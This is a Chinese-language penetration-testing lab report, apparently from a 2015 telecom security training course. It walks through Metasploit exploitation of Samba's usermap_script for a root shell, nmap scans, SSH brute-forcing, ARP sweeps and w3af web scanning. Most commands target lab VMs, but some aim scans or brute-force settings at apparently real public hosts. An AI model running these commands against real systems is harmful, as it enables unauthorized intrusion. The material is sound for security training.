渗透测试 实验报告（中国移动安全部）

渗透测试培训 3月13日

第一天：主要实验总结

首先利用struts2

漏洞，可以直接执行任意命令，取得主机控制权。

实验环境：

KALI linux 作为攻击工具； owasp 作为靶机

2003 metaspoitable 实现能够成功访问

使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限 search samba 查找模块

Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷

Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数

Set RHOST 10.10.10.254 设置主机攻击主机 Exploit启动攻击

1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为10.10.10.0/24 2、开启kali虚机，进入root模式，

首先进入msfconsle，修改初始密码为123456 msf〉> passwd [*] exec: passwd

输入新的 UNIX 密码： 重新输入新的 UNIX 密码： passwd：已成功更新密码

然后寻找samba模块 msf > search samba

Matching Modules ================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal

auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow

auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow

auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow

exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)

exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)

exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow

exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow

exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \

exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)

exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)

exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution

exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow

exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow

post/linux/gather/enum_configs normal Linux Gather Configurations

msf > use multi/samba/usermap_script 选择渗透攻击模块

msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷 Compatible Payloads ===================

Name Disclosure Date Rank Description ---- --------------- ---- -----------

cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)

cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)

cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)

cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)

cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)

cmd/unix/bind_netcat_gaping_ipv6 Bind TCP (via netcat -e) IPv6

cmd/unix/bind_perl Bind TCP (via Perl)

cmd/unix/bind_perl_ipv6 Bind TCP (via perl) IPv6

cmd/unix/bind_ruby Shell, Bind TCP (via Ruby)

cmd/unix/bind_ruby_ipv6 Bind TCP (via Ruby) IPv6

cmd/unix/bind_zsh Shell, Bind TCP (via Zsh)

cmd/unix/generic Generic Command Execution

cmd/unix/reverse Double Reverse TCP (telnet)

cmd/unix/reverse_awk Shell, Reverse TCP (via AWK)

cmd/unix/reverse_lua Reverse TCP (via Lua)

cmd/unix/reverse_netcat Reverse TCP (via netcat)

cmd/unix/reverse_netcat_gaping Reverse TCP (via netcat -e)

cmd/unix/reverse_openssl Double Reverse TCP SSL (openssl)

cmd/unix/reverse_perl Reverse TCP (via Perl)

cmd/unix/reverse_perl_ssl Reverse TCP SSL (via perl)

cmd/unix/reverse_php_ssl Reverse TCP SSL (via php)

cmd/unix/reverse_python Reverse TCP (via Python)

normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command normal Unix Command, normal Unix Command Shell, normal Unix Command normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)

cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)

cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell

payload => cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 查看需要设置的参数

msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机 RHOST => 10.10.10.254

msf exploit(usermap_script) > exploit启动攻击

[*] Started bind handler

[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800

已经取得10.10.10.254机子的控制权，可以增加用户 useradd test 用户增加成功

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测 -PU -sn UDP ping不列服务，-Pn不适用ping

nmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmp namp -sV -Pn xx.xx.xx.xx 列出服务详细信息

namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

nmap 网站扫描

msf > nmap

msf > nmap -sV -Pn 10.10.10.254 [*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST Nmap scan report for 10.10.10.254 Host is up (0.00020s latency).

All 1000 scanned ports on 10.10.10.254 are filtered

MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).

All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)

map done: 1 IP address (1 host up) scanned in 23.06 seconds

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

msf > nmap -O www.ctsi.com.cn [*] exec: nmap -O www.ctsi.com.cn

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST Nmap scan report for www.ctsi.com.cn (211.100.35.132) Host is up (0.0054s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)

No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(dir_scanner) > set THREADS 50 THREADS => 50

msf auxiliary(dir_scanner) > set RHOSTS www.http://m.wodefanwen.com/

set THREADS 50 run

2、nmap

服务扫描与查点

1、metasploit的scanner辅助模块中，有很多用于服务扫描和查点的工具，这些工具常以[service name]login 命名 search name:version

2、ssh查点

use auxiliary/scanner/ssh/ssh_version set RHOSTS xxxx set THREADS 100 run

&&&&&&&&&&&&&&&&&&&&&&&&

ssh查点实验：

root@kali:~# msfconsole

msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

Name Current Setting Required Description ---- --------------- -------- -----------

RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port

THREADS 1 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the SSH probe

msf auxiliary(ssh_version) > set RHOSTS 10.10.10.129 RHOSTS => 10.10.10.129

msf auxiliary(ssh_version) > set THREADS 100 THREADS => 100

msf auxiliary(ssh_version) > run

[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 口令猜解

地址可以是地址段或单IP或地质区段USER msfconsole里面

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 218.206.165.70 set USERNAME root set PASS_FILE /aaa set THREAS 100 run

vi 一个密码文件

口令嗅探

set auxiliary/sniffer/psnuffle

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

口令猜解实验：

msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name Current Setting Required Description ---- --------------- -------- -----------

BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier

RPORT 22 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS false no Try the username as the password for all users

USER_FILE no File containing usernames, one per

line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ssh_login) > set USERNAME root USERNAME => root

msf auxiliary(ssh_login) > set PASS_FILE / root/ passwd ://在root根目录下创建一个密码文件,名字叫passwd

PASS_FILE => root passwd

msf auxiliary(ssh_login) > set THREADS 50 THREADS => 50

msf auxiliary(ssh_login) > set RHOSTS 10.10.10.129 RHOSTS => 10.10.10.129 msf auxiliary(ssh_login) > run

[*] 10.10.10.129:22 SSH - Starting bruteforce

[*] 10.10.10.129:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid' [-] 10.10.10.129:22 SSH - [1/3] - Failed: 'root':'ahbieid'

[*] 10.10.10.129:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd' [-] 10.10.10.129:22 SSH - [2/3] - Failed: 'root':'xideoejd'

[*] 10.10.10.129:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'

[*] Command shell session 1 opened (10.10.10.128:40157 -> 10.10.10.129:22) at 2015-03-14 13:51:30 +0800

[+] 10.10.10.129:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '

[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 口令猜解成功。

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

主机存活探测实验：

msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name Current Setting Required Description ---- --------------- -------- -----------

INTERFACE no The name of the interface

RHOSTS yes The target address range or CIDR identifier SHOST no Source IP Address SMAC no Source MAC Address

THREADS 1 yes The number of concurrent threads

TIMEOUT 5 yes The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24 RHOSTS => 10.10.10.0/24

msf auxiliary(arp_sweep) > set THREADS 50 THREADS => 50

msf auxiliary(arp_sweep) > run

[*] 10.10.10.1 appears to be up (VMware, Inc.). [*] 10.10.10.2 appears to be up (VMware, Inc.). [*] 10.10.10.129 appears to be up (VMware, Inc.). [*] 10.10.10.130 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

网络扫描 Openvas 等

Web扫描

1、modules/auxiliary下，wmap load wmap（初始化wmap）

wmap_sites -a http://XXX (使用wmap进行扫描 wmap_sites -l

wmap_targets -t http：//XXXX

wamp_run -t (运行后，wmap会调用配置好的辅助模块对目标进行扫描，然后查看结果） wamp_run -e vunls ？？

www.exploit-db.com

www.netasploit.com/modules packetstormsecurity.org

cd /usr/share/w3af/

关于扫描的一个很实用的工具W3af w3af_console

plugins

audit xss(表示跨站漏洞) sql（表示注入）漏洞 back plugins

output html_file, console output config html_file

set output_file 123.html set verbose True back back plugins

crawl web_spider

crawl config web_spider set only_forward True set follow_regex .* set ignore_regex back back target

set target http://www.dvssc.com/mutillidae/ back

SQL注入关键字： 参数化查询 过滤（白名单）

编码（绕过防注，过滤） Mysql款字节

二次输入（任何输入都是有害的） 容错处理（暴错输入）

最小权限（目前，非常多root，见乌云）

http://218.206.165.70:8972/qhwxcs-djy/login.jsp 找到用户名和密码就可以登录进去

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 扫描实验：

root@kali:~# cd /usr/share/w3af/

root@kali:/usr/share/w3af# w3af_console w3af>>> plugins

本文来源：https://www.bwwdw.com/article/mkqt.html